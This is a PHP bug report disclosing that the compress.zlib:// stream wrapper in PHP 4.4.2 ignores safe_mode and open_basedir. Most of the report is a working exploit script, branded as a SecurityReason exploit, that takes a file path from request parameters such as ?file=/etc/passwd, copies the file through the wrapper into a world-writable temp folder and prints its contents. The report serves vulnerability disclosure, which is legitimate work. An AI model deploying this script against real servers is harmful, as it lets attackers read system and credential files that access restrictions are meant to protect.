From: unsecretarygeneral at gmail dot com Operating system: all PHP version: 4.4.2 PHP Bug Type: Safe Mode/open_basedir Bug description: zlib exploit
Description: ------------ The zlib fopen function boes not adhere to safe_mode , or open_base directory , hence an attacker can use zlib to compress 'any' file to a temp folder / world writable folder .. This should be critical , and is NOT fixed in the current CVS . Reproduce code: --------------- Example code . : called like http://hostname/?file=/etc/passwd <?php $file=""; // File to Include... or use _GET _POST $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp echo "<PRE>\n"; if(empty($file)) { if(empty($_GET['file'])) { if(empty($_POST['file'])) { die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like ?file=/etc/passwd\n <B><CENTER><FONTCOLOR=\"RED\">SecurityReason.Com Exploit</FONT></CENTER></B>" ); } else { $file=$_POST['file']; } } else { $file=$_GET['file']; } } $temp=tempnam($tymczas, "cx"); if(copy("compress.zlib://".$file, $temp)) { $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "<B>--- Start File ".htmlspecialchars($file)."-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File".htmlspecialchars($file)." ---------------\n"; unlink($temp); die("\n<FONT COLOR=\"RED\"><B>File".htmlspecialchars($file)." has been already loaded. SecurityReason Team;]</B></FONT>"); } else { die("<FONT COLOR=\"RED\"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have access.</CENTER></FONT>"); } ?> Expected result: ---------------- list of /etc/passwd Actual result: -------------- list of /etc/passwd -- Edit bug report at http://bugs.php.net/?id=37071&edit=1 -- Try a CVS snapshot (PHP 4.4): http://bugs.php.net/fix.php?id=37071&r=trysnapshot44 Try a CVS snapshot (PHP 5.1): http://bugs.php.net/fix.php?id=37071&r=trysnapshot51 Try a CVS snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=37071&r=trysnapshot60 Fixed in CVS: http://bugs.php.net/fix.php?id=37071&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=37071&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=37071&r=needtrace Need Reproduce Script: http://bugs.php.net/fix.php?id=37071&r=needscript Try newer version: http://bugs.php.net/fix.php?id=37071&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=37071&r=support Expected behavior: http://bugs.php.net/fix.php?id=37071&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=37071&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=37071&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=37071&r=globals PHP 3 support discontinued: http://bugs.php.net/fix.php?id=37071&r=php3 Daylight Savings: http://bugs.php.net/fix.php?id=37071&r=dst IIS Stability: http://bugs.php.net/fix.php?id=37071&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=37071&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=37071&r=float No Zend Extensions: http://bugs.php.net/fix.php?id=37071&r=nozend MySQL Configuration Error: http://bugs.php.net/fix.php?id=37071&r=mysqlcfg
